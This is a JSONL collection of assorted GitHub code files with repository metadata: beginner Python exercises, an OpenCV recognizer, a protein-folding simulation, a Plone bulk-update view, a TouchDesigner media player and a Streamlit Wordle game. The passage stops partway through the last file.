+{"seq_id":"35916199716","text":"# Создать текстовый файл (не программно), сохранить в нем несколько строк, выполнить подсчет количества строк,\n# количества слов в каждой строке.\n\nfrom tools import get_data_from_file\n\n\ndef get_words_count(data):\n \"\"\"\n Возвращает список из числа слов в каждом элементе списка data\n Считается, что слова в каждом элементе списка data разделены пробелом\n Каждый элемент списка data является строкой\n :param data: список строк\n :type data List[str]\n :return: список из числа слов в каждой строке\n :type: List[int]\n \"\"\"\n return [len(d.split()) for d in data]\n\n\ndef main():\n \"\"\"\n Основная функция\n Выводит информацию о содержимом файла: количество строк в файле, количество слов в каждой строке файла\n Слова в файле считаются отдельными, если они разделены пробелами\n \"\"\"\n # Список строк из файла\n data = get_data_from_file('task2.txt')\n # Количество слов в каждой строке из файла\n words_count_by_row = get_words_count(data)\n\n print('Общее количество строк в файле: ', len(data))\n for row_idx, words_count in enumerate(words_count_by_row):\n print(f'Количество слов в строке {row_idx + 1}: {words_count}')\n\n\nmain()\n","repo_name":"lkamalt/python-basics","sub_path":"lesson5/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"23034015678","text":"#!/usr/bin/env python\n\n\nimport wx\n\nfrom InteractiveRecognizer import InteractiveRecognizer\nimport PyInstallerUtils\n\n\ndef main():\n app = wx.App()\n recognizerPath = PyInstallerUtils.resourcePath(\n 'recognizers/lbph_cat_faces.xml')\n cascadePath = PyInstallerUtils.resourcePath(\n # Uncomment the next argument for LBP.\n #'cascades/lbpcascade_frontalcatface.xml')\n # Uncomment the next argument for Haar with basic\n # features.\n #'cascades/haarcascade_frontalcatface.xml')\n # Uncomment the next argument for Haar with extended\n # features.\n 'cascades/haarcascade_frontalcatface_extended.xml')\n interactiveRecognizer = InteractiveRecognizer(\n recognizerPath, cascadePath,\n scaleFactor=1.2, minNeighbors=1,\n minSizeProportional=(0.125, 0.125),\n title='Interactive Cat Face Recognizer')\n interactiveRecognizer.Show()\n app.MainLoop()\n\nif __name__ == '__main__':\n main()\n","repo_name":"PacktPublishing/OpenCV-4-for-Secret-Agents-Second-Edition","sub_path":"Chapter003/InteractiveCatFaceRecognizer.py","file_name":"InteractiveCatFaceRecognizer.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"2"}
+{"seq_id":"7442054936","text":"#! /usr/bin/env/python\r\nfrom aminoacids import AminoAcid\r\nfrom random import randint,choice,random\r\nfrom math import exp\r\nfrom decimal import Decimal,getcontext\r\nfrom trajectoryAndStatistics import *\r\ngetcontext().prec=3\r\n\r\nclass Simulation:\r\n\r\n def __init__(self, chain='PHPPHPPHHPPHHPPHPPHP',K=10000,Tmax=1.0,Tmin=0.15,Tdelta=0.05,kB=1):\r\n self.chain=[AminoAcid(chain[i]) for i in range(len(chain))]\r\n self.K=K\r\n self.T=float(Tmax)\r\n self.Tmin=Decimal(Tmin)\r\n self.Tdelta=Decimal(Tdelta)\r\n self.kB=kB\r\n self.rotations=set([90,180,270])\r\n self.best=self.chain\r\n self.Hbest=0\r\n\r\n \r\n def Run(self):\r\n st=0\r\n print('Przed ruszaniem: ')\r\n for atom in self.chain:\r\n print(atom)\r\n trajectory(st,self.chain,[a.coords for a in self.chain])\r\n stats(0)\r\n Hcount=[0]\r\n while Decimal(self.T) >= self.Tmin:\r\n accepted_steps=0\r\n e_sum=0\r\n e_squared_sum=0\r\n i_sum=0\r\n st+=1\r\n print(\"temperatura \"+str(self.T))\r\n for step in range(self.K):\r\n h=0\r\n num=randint(0,len(self.chain)-2)#bo oprocz ostatniego\r\n coor=self.chain[num].coords\r\n for a in self.chain:\r\n a.SetPlace(a.coords-coor)\r\n rots=set()\r\n for l in range(3):\r\n rotate=choice(list(self.rotations-rots))\r\n rots.add(rotate)\r\n bad=False\r\n rotated=[]\r\n for a1 in self.chain:\r\n if a1.number<=num:\r\n rotated.append(a1)\r\n else:\r\n rotated.append(a1.Rotate(rotate))\r\n while not bad:\r\n for r1 in rotated:\r\n for r in rotated:\r\n if (r1)!=(r):\r\n if r.coords==r1.coords:\r\n bad=True\r\n break;\r\n if not bad:\r\n break\r\n if not bad:\r\n x=0\r\n y=0\r\n for a1 in rotated:\r\n for a2 in rotated:\r\n if a1!=a2 and rotated.index(a1)!=rotated.index(a2)-1 and rotated.index(a1)!=rotated.index(a2)+1:\r\n if a1.type=='H' and a2.type=='H':\r\n if a1.Neighbour(a2):\r\n h+=1\r\n x+=a1.coords[0]\r\n y+=a1.coords[1]\r\n h/=2\r\n if h>=Hcount[-1]:\r\n for x in range(len(self.chain[(num+1):])):\r\n self.chain[(num+1):][x].SetPlace(rotated[(num+1):][x].coords)\r\n Hcount.append(h)\r\n accepted=True\r\n else:\r\n prob=((exp(h/(self.kB*self.T)))/(exp(Hcount[-1]/(self.kB*self.T))))\r\n if random() <= prob:\r\n accepted=True\r\n else:\r\n accepted=False\r\n\r\n else:\r\n accepted=False\r\n if accepted:\r\n for x in range(len(self.chain[(num+1):])):\r\n self.chain[(num+1):][x].SetPlace(rotated[(num+1):][x].coords)\r\n Hcount.append(h)\r\n if Hcount[-1]>self.Hbest:\r\n self.Hbest=Hcount[-1]\r\n self.best=[a.coords for a in self.chain]\r\n contacts(self.T,accepted_steps,h)\r\n accepted_steps+=1\r\n e_sum+=-h\r\n e_squared_sum+=(-h)**2\r\n x/=len(self.chain)\r\n y/=len(self.chain)\r\n for a in self.chain:\r\n i_sum+=(x-a.coords[0])**2 + (y-a.coords[1])**2\r\n Hcount=Hcount[-2:]\r\n trajectory(st,self.chain,self.best)\r\n Cv=((e_squared_sum/accepted_steps)-((e_sum/accepted_steps)**2))/(self.kB*(self.T**2))\r\n I=i_sum/accepted_steps\r\n stats(self.T,Cv,I)\r\n plot_contacts(self.T)\r\n self.Hbest=0\r\n self.T=float(Decimal(self.T)-self.Tdelta)\r\n plot_stats()\r\n \r\n def __str__(self):\r\n return(str(self.atoms))\r\n \r\n def __repr__(self):\r\n return(str(self.atoms))\r\n","repo_name":"hansiu/modelo2-HPmodelSimulation","sub_path":"simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"28299556269","text":"import emoji\r\nfrom random import choice\r\nrepetir = 1\r\nprint('-' * 50)\r\nprint(' '*15 + '\\033[1;36mPEDRA, PAPEL, TESOURA\\033[m')\r\nwhile repetir == 1:\r\n print('-' * 50)\r\n jogador = int(input('\\033[1;m[0]SAIR DO JOGO' + emoji.emojize(' :heavy_multiplication_x:') + '\\n\\n[1]PEDRA' + emoji.emojize(' :baseball:') + '\\n[2]PAPEL' + emoji.emojize(' :page_facing_up:') + '\\n[3]TESOURA\\033[m' + emoji.emojize(' :scissors:')))\r\n opc = 'PEDRA', 'PAPEL', 'TESOURA'\r\n pc = choice(opc)\r\n if jogador == 0:\r\n repetir = 0\r\n print('\\n' + ' ' * 10 + '\\033[1;36mFIM DE JOGO OBRIGADO, POR JOGAR!\\033[m')\r\n elif jogador == 1 and pc == 'TESOURA' or jogador == 2 and pc == 'PEDRA' or jogador == 3 and pc == 'PAPEL':\r\n print('\\n\\033[1mO PC Escolheu {} Portanto\\033[m \\033[1;32m[VOCÊ VENCEU!]\\033[m'.format(pc))\r\n elif jogador == 1 and pc == 'PEDRA' or jogador == 2 and pc == 'PAPEL' or jogador == 3 and pc == 'TESOURA':\r\n print('\\n\\033[1mO PC Escolheu {} Portanto\\033[m \\033[1;33m[VOCÊS EMPATARAM!]\\033[m'.format(pc))\r\n else:\r\n print('\\n\\033[1mO PC Escolheu {} Portanto\\033[m \\033[1;31m[VOCÊ PERDEU!]\\033[m'.format(pc))\r\nprint('-' * 50)\r\n","repo_name":"WeDias/RespCEV","sub_path":"Exercicios-Mundo2/ex045.py","file_name":"ex045.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"22361015428","text":"from logging import getLogger\nfrom functools import partial\n\nfrom zope.component.hooks import getSite\n\n\nfrom Products.Five.browser import BrowserView\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\n\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.statusmessages.interfaces import IStatusMessage\n\nimport openpyxl\n\nfrom emrt.necd.content.browser.xls_utils import get_valid_sheet_rows\nfrom emrt.necd.content.browser.xls_utils import clean_value\n\nLOG = getLogger('emrt.necd.content.bulk_update')\n\n\ndef _read_col(row, nr):\n try:\n val = clean_value(row[nr].value)\n except IndexError:\n val = u''\n return val.strip() if val else u''\n\n\ndef _obj_from_url(context, site_url, url):\n traversable = str(url.split(site_url)[-1][1:])\n return context.unrestrictedTraverse(traversable)\n\n\ndef replace_conclusion_text(obj, text):\n conclusion = obj.get_conclusion()\n if text and conclusion:\n conclusion.text = text\n\ndef replace_description_text(obj, text):\n if text:\n obj.text = text\n\n\nclass BulkUpdateView(BrowserView):\n\n index = ViewPageTemplateFile('templates/bulk_update.pt')\n\n def __call__(self):\n return self.index()\n\n def start(self, xls):\n portal = getSite()\n wb = openpyxl.load_workbook(xls, read_only=True, data_only=True)\n sheet = wb.worksheets[0]\n\n valid_rows = get_valid_sheet_rows(sheet)\n\n context = self.context\n site_url = portal.absolute_url()\n obj_from_url = partial(_obj_from_url, context, site_url)\n catalog = getToolByName(portal, 'portal_catalog')\n\n for row in valid_rows:\n target = _read_col(row, 0)\n conclusion_text = _read_col(row, 1)\n description_text = _read_col(row, 2)\n ob = obj_from_url(target)\n replace_conclusion_text(ob, conclusion_text)\n replace_description_text(ob, description_text)\n catalog.reindexObject(ob, idxs=[\"SearchableText\"])\n\n if len(valid_rows) > 0:\n (IStatusMessage(self.request)\n .add('Bulk update successful!', type='info'))\n else:\n (IStatusMessage(self.request)\n .add('No data provided!', type='warn'))\n self.request.RESPONSE.redirect(context.absolute_url())\n","repo_name":"eea/emrt.necd.content","sub_path":"emrt/necd/content/browser/bulk_update.py","file_name":"bulk_update.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"32928085851","text":"def _make_ffmpeg_args(url: str, path: str, join: bool = False):\r\n args = [\r\n \"ffmpeg\",\r\n \"-i\",\r\n url,\r\n \"-f\",\r\n \"image2\",\r\n \"-update\",\r\n \"1\",\r\n \"-vframes\",\r\n \"1\",\r\n path,\r\n \"-y\",\r\n ]\r\n\r\n if join:\r\n args = \" \".join(args)\r\n\r\n return args\r\n","repo_name":"minibox24/twitch-thumbnail","sub_path":"twitch_thumbnail/ffmpeg.py","file_name":"ffmpeg.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"9840668755","text":"from numpy.lib.polynomial import poly1d\r\nimport numpy as np\r\nfrom scipy.integrate import quad\r\n\r\ndef horner(x, t):\r\n\r\n sol = x[0]\r\n\r\n for i in range(0, len(x)-1): # i = 0,1,2\r\n sol = sol*t + x[i+1] # x[1,2,3]\r\n return sol\r\n\r\n\r\nx = [4, 3, 2, 1] # 4x**3 + 3x**2 + 2x + 1 would be seen as: x(x(x(1) + 2) + 3) + 4\r\n# x = [1, 2, 3, 4]\r\nt = 2\r\n\r\nno_of_coeff = len(x)\r\n\r\ndegree = no_of_coeff - 1\r\n\r\npt = poly1d(x)\r\nprint(\"Polynomial given:\\n\", pt)\r\nprint(\"degree of the polynomial is: \", degree)\r\n\r\nprint(\"Solution for the given polynomial at t =\", t, \"is:\", horner(x, t)) # (a) part: solution for general equation\r\n\r\nderivative = np.polyder(pt, 1) # derivative of order 1 of pt\r\n\r\nderToPol = np.array(derivative)\r\n\r\nprint(\"Derivative for the given polynomial is:\\n\", derivative)\r\nprint(\"Solution for the derivative at t =\", t, \"is:\", horner(derToPol, t)) # (b).(i) part: first derivative of pt\r\n\r\na = 1\r\nb = 2\r\nI = quad(pt, a, b)\r\nintegration = sum(list(I))\r\n\r\nprint(\"Solution for the integration is:\", round(integration, 2)) # (b).(ii) part: first integral of pt\r\n\r\n","repo_name":"sowmya8900/DECAGT-IIIT-D-Internship","sub_path":"Practice/problem7.1_SY.py","file_name":"problem7.1_SY.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"34327434696","text":"\"\"\"The ClassificationPlot plots the `output_json` of a classification\n\n- It automatically determines the `theme` from the query args\n- It allows you to change the color\n\"\"\"\nimport panel as pn\n\nfrom paithon.base.classification import ClassificationPlot\nfrom paithon.image.image_classification import dummy_model\nfrom paithon.shared.pane.doc_string_viewer import DocStringViewer\nfrom paithon.shared.template import ACCENT_COLOR, fastlisttemplate\n\n\ndef test_classification_plot():\n \"\"\"Test of the ClassificationPlot\"\"\"\n _, _, output_json = dummy_model(None)\n plot = ClassificationPlot(\n output_json=output_json,\n color=ACCENT_COLOR,\n height=800,\n sizing_mode=\"stretch_width\",\n )\n return plot\n\n\nif __name__.startswith(\"bokeh\"):\n pn.extension(sizing_mode=\"stretch_width\")\n classification_plot = test_classification_plot()\n run_button = pn.widgets.Button(name=\"Run Classification\", button_type=\"primary\")\n\n def _run_classification(_):\n classification_plot.output_json = dummy_model(None)[2]\n\n run_button.on_click(_run_classification)\n card = pn.layout.Card(\n DocStringViewer(object=classification_plot, height=600),\n header=\"# ClassificationPlot\",\n collapsed=True,\n )\n fastlisttemplate(\n title=\"ClassificationPlot\",\n sidebar=[run_button, classification_plot.controls(jslink=False)],\n main=[card, classification_plot],\n ).servable()\n","repo_name":"MarcSkovMadsen/paithon","sub_path":"tests/apps/test_classification_plot_app.py","file_name":"test_classification_plot_app.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"}
+{"seq_id":"43712774756","text":"class Solution:\n def findNumberOfLIS(self, nums: List[int]) -> int:\n \"\"\"\n LIS means the numbers have to be strictly increasing. \n First we try to find which is LIS. Being part of which sequence is most helpful through DP.\n We also keep updating the count, if we found more than 1 sequence with the same max_len\n in the end we just return the no of sequences with the max len. \n \"\"\"\n n = len(nums)\n len_, count_ = [1]*(n), [1]*(n)\n max_=float('-inf')\n \n for i in range(n):\n for j in range(i):\n if nums[i]>nums[j]:\n if len_[j]+1>len_[i]:\n len_[i] = len_[j]+1\n count_[i] = count_[j]\n elif len_[j]+1==len_[i]:\n count_[i]+=count_[j]\n max_=max(max_, len_[i])\n \n res = 0\n for i in range(n):\n if len_[i]==max_: res+=count_[i]\n \n return res","repo_name":"amolmishra23/leetcode_solutions","sub_path":"673-number-of-longest-increasing-subsequence/673-number-of-longest-increasing-subsequence.py","file_name":"673-number-of-longest-increasing-subsequence.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"24291367411","text":"#Crie um programa crie uma progreção aritimética de 10 números. O programa pede o número inicial e a razão. Utilize um estrutura de repetição\ndef progressao(i, r):\n decimo = i + 9 * r\n for c in range(i, decimo + r, r):\n print(c, end=' ')\n print('Acabou')\n \n\ndef main():\n inicio = int(input('Digite um número inteiro qualquer que será o inicio: '))\n razao = int(input('Digite o número que será a razão: '))\n progressao(inicio, razao)\nif __name__ == \"__main__\":\n main()","repo_name":"WillamiFerreira/Curso-de-Python-Curso-em-Video","sub_path":"desafio061.py","file_name":"desafio061.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"74195021805","text":"import logging\nimport json\nimport traceback\nimport os\nfrom TDStoreTools import StorageManager\nTDF = op.TDModules.mod.TDFunctions\n\n# setup logging profile\nlogger = logging.getLogger(__name__)\n\nclass Player:\n\t''' Modular A/B player with ability to adjust number of unique decks '''\n\t\n\tdef __init__(self, ownerComp):\n\t\t\n\t\t''' operators '''\n\t\tself.ownerComp = parent()\n\t\tself.player = ownerComp\n\n\t\t''' storage manager '''\n\t\tself.PlayerStored = StorageManager(self, ownerComp, locked=False)\n\n\t\t''' attributes '''\n\t\tself.DefaultMedia = self.ownerComp.par.Defaultmedia.eval()\n\t\tself._defaultLength = 100\n\t\tself._assetPath = self.ownerComp.par.Assetpath.eval()\n\t\tself.Demomedia = os.listdir(self._assetPath)\n\n\t\t''' properties '''\n\t\tself._Crossfadeduration = tdu.Dependency(self.ownerComp.par.Crossfadeduration)\n\t\tself._Imageduration = tdu.Dependency(self.ownerComp.par.Imageduration)\n\t\t\n\t\tself._decks = self.ownerComp.par.Decks.eval()\n\t\tself.Decks = self.ownerComp.par.Decks.eval()\n\t\t\n\t\tlogger.info('Initialized...')\n\t\t\n\t@property\n\tdef Decks(self):\n\t\treturn self.ownerComp.par.Decks.eval()\n\n\t@Decks.setter\n\tdef Decks(self, value):\n\t\tif value < self._decks:\n\t\t\t[self.removeDeck(value+deck) for deck in range(self._decks-value)]\t\t\n\t\telse:\n\t\t\t[self.addDeck(deck) for deck in range(value)]\n\n\t\tself._decks = value\n\n\t@property\n\tdef Crossfadeduration(self):\n\t\treturn self._Crossfadeduration*me.time.rate\n\n\t@property\n\tdef Imageduration(self):\n\t\treturn self._Imageduration*me.time.rate\n\n\n\tdef addDeck(self, value):\n\t\t''' Update StorageManager decks '''\n\t\t\n\t\t# add item to storage manager\n\t\tself.PlayerStored._addItem({'name': 'Slot_{}'.format(value), 'default': 0})\n\n\t\n\t\tself.PlayerStored._addItem({'name': 'Deck_{}_Slot_0'.format(value), \n\t\t\t\t\t\t\t\t\t\t\t'default': {'file': self.DefaultMedia, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t'length': self._defaultLength}, \n\t\t\t\t\t\t\t\t\t\t\t'dependable': True})\n\t\n\t\tself.PlayerStored._addItem({'name': 'Deck_{}_Slot_1'.format(value), \n\t\t\t\t\t\t\t\t\t\t\t'default': {'file': self.DefaultMedia, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t'length': self._defaultLength}, \n\t\t\t\t\t\t\t\t\t\t\t'dependable': True})\n\t\t\t\t\t\t\t\t\t\t\n\t\tself.PlayerStored._sync()\n\n\tdef removeDeck(self, value):\n\n\t\tdel self.PlayerStored._items['Slot_{}'.format(value)]\n\t\tdel self.PlayerStored._items['Deck_{}_Slot_0'.format(value)]\n\t\tdel self.PlayerStored._items['Deck_{}_Slot_1'.format(value)]\n\n\t\tself.PlayerStored._sync()\n\n\n\tdef LoadMedia(self, payload):\n\t\t''' Parse 'on-demand' message message from 'Conductor' extension '''\n\n\t\ttry:\n\n\t\t\tfor key, value in payload.items():\n\n\t\t\t\t# load args\n\t\t\t\tmedia = value[0]\n\t\t\t\tdeck = value[1]\n\t\t\t\tgroup = 'deck_{}'.format(deck)\n\n\t\t\t\t# kill active run delays\n\t\t\t\tself.killRuns(group)\n\n\t\t\t\t# preload incoming media\n\t\t\t\tself.preloadMedia(group, media, deck)\n\n\t\texcept:\n\t\t\tif op.Node.Debug:\n\t\t\t\tlogger.error(traceback.format_exc()) \n\n\n\tdef preloadMedia(self, group, media, deck, playlist=None, frame=0):\n\t\t''' preload slot '''\n\n\t\ttry:\n\n\t\t\t# get next slot for deck \n\t\t\tslot = abs(getattr(self, 'Slot_{}'.format(deck))-1)\n\t\n\t\t\t# next timer / player\n\t\t\ttimer = self.ownerComp.op('deck_{}/timer_slot_{}'.format(deck,slot))\n\t\t\tplayer = self.ownerComp.op('deck_{}/mov_slot_{}'.format(deck,slot))\n\n\t\t\t# load remote if sent - otherwise load locally\n\t\t\tif 'http' in media:\n\t\t\t\tfilepath = media\n\t\t\telse:\n\t\t\t\t# full filepath and filetype of incoming media \n\t\t\t\tfilepath = '{}{}'.format(self._assetPath, media)\n\t\t\t\n\t\t\tfiletype = str(filepath).split('.')[-1]\n\t\t\n\t\t\t# if valid media present\n\t\t\tif media and self.validateFile(filepath, filetype):\n\t\t\t\t\n\t\t\t\t# set filepath and length attributes for next slot\n\t\t\t\tsetattr(self, \"Deck_{}_Slot_{}\".format(deck, slot), {'file' : filepath, 'length': self._defaultLength})\n\n\t\t\t\t# cue upcoming timer preload upcoming media slot\n\t\t\t\top(timer).par.cue = 1\n\t\t\t\top(player).preload()\n\n\t\t\t\t# not fully preread - run preload check\n\t\t\t\tif not op(player).isFullyPreRead:\n\t\t\t\t\trun(\"args[0](args[1], args[2], args[3], args[4], args[5], args[6])\", \n\t\t\t\t\t\tself.checkPreload, player, timer, deck, slot, group, filepath, fromOP=me, group=group, delayFrames=1)\n\t\t\t\t\n\t\t\t\t# fully preread - play media\n\t\t\t\telse:\n\t\t\t\t\tself.playMedia(deck, slot, player, timer, filepath, group)\n\t\n\t\t\telse:\n\t\t\t\tif op.Node.Debug:\n\t\t\t\t\tlogger.error('Invalid Media: {}'.format(traceback.format_exc()))\n\n\t\texcept:\n\t\t\tif op.Node.Debug:\n\t\t\t\tlogger.error(traceback.format_exc())\n\n\n\tdef checkPreload(self, player, timer, deck, slot, group, filepath, frame=1):\n\t\t''' check preload status '''\n\n\t\ttry:\n\n\t\t\t# not fully preread - rerun preload check\n\t\t\tif not op(player).isFullyPreRead:\n\t\t\t\t\n\t\t\t\t# failed preload - force play anyway - can affect output, use with caution\n\t\t\t\tif op(player).isInvalid or frame >= me.time.rate:\n\t\t\t\t\tself.playMedia(deck, slot, player, timer, filepath, group)\n\t\t\t\t\t\n\t\t\t\t\tif op.Node.Debug:\n\t\t\t\t\t\tlogger.error('Preload Failed: {}'.format(traceback.format_exc()))\n\n\t\t\t\t# re-run preload check\n\t\t\t\telse:\n\t\t\t\t\tframe+=1\n\t\t\t\t\trun(\"args[0](args[1], args[2], args[3], args[4], args[5], args[6], args[7])\", \n\t\t\t\t\t\tself.checkPreload, player, timer, deck, slot, group, filepath, frame, fromOP=me, group=group, delayFrames=1)\n\t\t\t\n\t\t\t# fully preread - play media\n\t\t\telse:\n\t\t\t\tself.playMedia(deck, slot, player, timer, filepath, group)\n\n\t\texcept:\n\t\t\tif op.Node.Debug:\n\t\t\t\tlogger.error(traceback.format_exc())\n\n\t\n\tdef playMedia(self, deck, slot, player, timer, filepath, group):\n\t\t'''play media'''\n\n\t\ttry:\n\n\t\t\t# grab file extension\n\t\t\textension = filepath.split('.')[-1]\n\n\t\t\t# set length for movie/image\n\t\t\tlength = op(player).numImages\n\t\t\trate = op(player).rate\n\t\t\tlength = length * (me.time.rate/rate)\n\t\t\tif extension in tdu.fileTypes['image']:\n\t\t\t\tlength = self.Image\n\n\t\t\t# set length\n\t\t\tsetattr(self, \"Deck_{}_Slot_{}\".format(deck, slot), {'file' : filepath, 'length': length})\n\n\t\t\t# cue deck\n\t\t\tself.ownerComp.op('deck_{}/timer_slot_{}'.format(deck, slot)).par.cue = 0\n\t\t\tself.ownerComp.op('deck_{}/timer_slot_{}'.format(deck, slot)).par.start.pulse()\n\t\t\trun(\"args[0].op('deck_{}/timer_slot_{}'.format(args[1], args[2])).par.cue = 1\", \n\t\t\t\tself.ownerComp, deck, abs(slot-1), fromOP=me, group=group, delayFrames=self._Crossfadeduration*me.time.rate)\n\n\t\t\t# swap deck slot\n\t\t\tsetattr(self, 'Slot_{}'.format(deck), slot)\n\n\t\t\tif op.Node.Debug:\n\t\t\t\tlogger.info('Playing {}'.format(filepath))\n\t\t\t\t\t\n\t\texcept:\n\t\t\tif op.Node.Debug:\n\t\t\t\tlogger.error(traceback.format_exc())\n\n\n\tdef validateFile(self, filepath, filetype):\n\t\t''' check media file validity '''\n\n\t\ttry:\n\t\t\t\n\t\t\tif 'http' not in filepath:\n\t\t\t\t# does it exist on local drive\n\t\t\t\tif os.path.isfile(filepath):\n\t\t\t\t\t# is it a valid image or movie file\n\t\t\t\t\tif filetype in (tdu.fileTypes['image'] + tdu.fileTypes['movie']):\n\t\t\t\t\t\treturn True\n\t\t\t\telse:\n\t\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\treturn True\n\n\t\texcept:\n\t\t\tif op.Node.Debug:\n\t\t\t\tlogger.error(traceback.format_exc())\n\n\n\tdef killRuns(self, group):\n\t\t''' kill grouped runs '''\n\n\t\ttry:\n\t\t\tfor i in runs:\n\t\t\t\tif i.group == group:\n\t\t\t\t\ti.kill()\n\t\t\t\t\t# logger.info('kill: ' + str(group))\n\t\n\t\texcept:\n\t\t\tif op.Node.Debug:\n\t\t\t\tlogger.error(traceback.format_exc())\t\t\t","repo_name":"avc-choy/td-summit-2019","sub_path":"py/PlayerMod.py","file_name":"PlayerMod.py","file_ext":"py","file_size_in_byte":6996,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"2"}
+{"seq_id":"6967240168","text":"# STREAMLIT Part\nimport streamlit as st\nimport random\nimport re\nimport time\n\nfrom datasets import load_dataset\n\ndataset = load_dataset(\"Open-Orca/OpenOrca\", split=\"train\")\n\n\ndef replace_random_word(text, replacement=\"\"):\n # Splitting the text into words\n words = text.split()\n # Get the indices of the words which are at least 6 letters long\n long_word_indices = [i for i, word in enumerate(words) if len(word) >= 5]\n # If there are no long words, return None and original sentence\n if not long_word_indices:\n return None, text\n # Choose a random index from the long words\n random_index = random.choice(long_word_indices)\n # Save the word to be replaced\n replaced_word = words[random_index]\n # Replace the word\n words[random_index] = replacement\n # Join the words back into a single string\n modified_text = ' '.join(words)\n # Return the replaced word and the modified text\n return replaced_word, modified_text\n\n\ndef pick_random_prompt():\n while True:\n # Randomly pick a data point\n datapt = random.choice(dataset)\n\n # If 'question' is shorter than 273 characters\n if len(datapt['question']) < 273:\n\n # Replace random word\n replaced_word, modified_text = replace_random_word(\n datapt['question'])\n response = datapt['response']\n # Return the results\n return replaced_word, modified_text, response\n\n\ndef check_guess(secret_word, guess):\n # Initialize a list of 'gray' for each letter in the guess.\n result = []\n for n in range(len(guess)):\n result.append({'letter': guess[n], 'color': 'gray'})\n\n # Initialize a list to keep track of which letters in the secret word have been used.\n used = [False] * len(secret_word)\n\n # First, check for letters in the correct position.\n for m in range(len(guess)):\n if guess[m] == secret_word[m]:\n # The letter is correct and in the correct position.\n result[m]['color'] = 'green'\n used[m] = True\n\n # Then, check for letters in the wrong position.\n for l in range(len(guess)):\n if result[l]['color'] == 'gray' and guess[l] in secret_word and not used[secret_word.index(guess[l])]:\n # The letter is correct but in the wrong position.\n result[l]['color'] = 'yellow'\n used[secret_word.index(guess[l])] = True\n\n return result\n\n\ndef generate_feedback_html(feedback, guess):\n # Encapsulate the feedback display in a function for reuse\n feedback_html = \"\"\n for i, color in enumerate(feedback):\n block_color = 'lime' if color['color'] == 'green' else 'yellow' if color['color'] == 'yellow' else 'lightgray'\n feedback_html += f'
{guess[i]}
'\n feedback_html += \"
\"\n return feedback_html\n\n\ndef sanitize_input(input_string):\n # Remove leading/trailing whitespace and convert to lowercase\n sanitized_input = input_string.strip().lower()\n # Ensure input only contains alphabetic characters\n if re.match(\"^[a-z]*$\", sanitized_input):\n return sanitized_input\n else:\n return \"\"\n\n\ndef message_html(msg, color='gray'):\n return f\"\"\"\n \n {msg}\n
\n \"\"\"\n\n\ndef main():\n st.title('LLM Wordle')\n\n st.write(\"Guess the word in 6 tries or less!\")\n # Create two columns for the Wordle game and the chat.\n game_col, chat_col = st.columns(2)\n game_col.write(\"## Prompt\")\n # Initialize session state variables.\n if 'secret_word' not in st.session_state:\n replaced_word, modified_prompt, response = pick_random_prompt()\n st.session_state.secret_word = replaced_word\n st.session_state.prompt = modified_prompt\n st.session_state.response = response\n if 'guesses' not in st.session_state:\n st.session_state.guesses = []\n if 'feedbacks' not in st.session_state:\n st.session_state.feedbacks = []\n if 'input_key' not in st.session_state:\n st.session_state.input_key = \"input\"\n if 'game_over' not in st.session_state:\n st.session_state.game_over = False\n if 'chat_history' not in st.session_state:\n st.session_state.chat_history = []\n\n # Handle play again logic.\n if st.session_state.game_over:\n if game_col.button(\"Play again? click twice\"):\n st.session_state.game_over = False\n replaced_word, modified_prompt, response = pick_random_prompt()\n st.session_state.secret_word = replaced_word\n st.session_state.prompt = modified_prompt\n st.session_state.response = response\n st.session_state.guesses = []\n st.session_state.feedbacks = []\n st.session_state.chat_history = []\n st.session_state.input_key = \"input\" + \\\n str(random.randint(0, 1000000))\n\n # Check if game is still ongoing.\n if not st.session_state.game_over:\n # Allow the user to enter a guess.\n game_col.write(st.session_state.prompt)\n guess = game_col.text_input(\n \"Enter your guess\", key=st.session_state.input_key)\n guess = sanitize_input(guess) # Sanitize the user input\n\n chat_col.markdown(\"## Response\")\n chat_col.write(st.session_state.response)\n\n # Check the guess.\n if guess in st.session_state.guesses:\n game_col.write(\"You already guessed that word.\")\n elif len(guess) == 0:\n game_col.write(\"Please enter a word.\")\n else:\n feedback = check_guess(st.session_state.secret_word, guess)\n st.session_state.guesses.append(guess)\n st.session_state.feedbacks.append(feedback)\n st.session_state.input_key = \"input\" + \\\n str(random.randint(0, 1000000))\n\n if guess == st.session_state.secret_word:\n game_col.write(\"You win!\")\n st.session_state.game_over = True\n if game_col.button(\"Next\"):\n pass\n elif len(st.session_state.guesses) >= 6:\n game_col.write(\"You lost! the word was \" +\n st.session_state.secret_word)\n st.session_state.game_over = True\n if game_col.button(\"Next\"):\n pass\n\n # Display previous feedbacks\n for past_feedback, past_guess in zip(st.session_state.feedbacks, st.session_state.guesses):\n past_feedback_html = generate_feedback_html(\n past_feedback, past_guess)\n game_col.markdown(past_feedback_html, unsafe_allow_html=True)\n\n for message in 